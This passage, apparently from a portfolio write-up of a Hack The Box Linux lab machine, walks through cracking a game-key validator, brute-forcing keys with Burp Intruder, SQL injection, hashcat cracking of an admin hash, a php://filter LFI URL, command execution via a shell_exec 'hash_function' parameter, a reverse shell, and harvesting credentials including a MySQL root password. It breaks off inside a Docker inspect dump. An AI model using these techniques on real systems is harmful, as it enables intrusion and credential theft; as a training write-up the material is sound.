                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
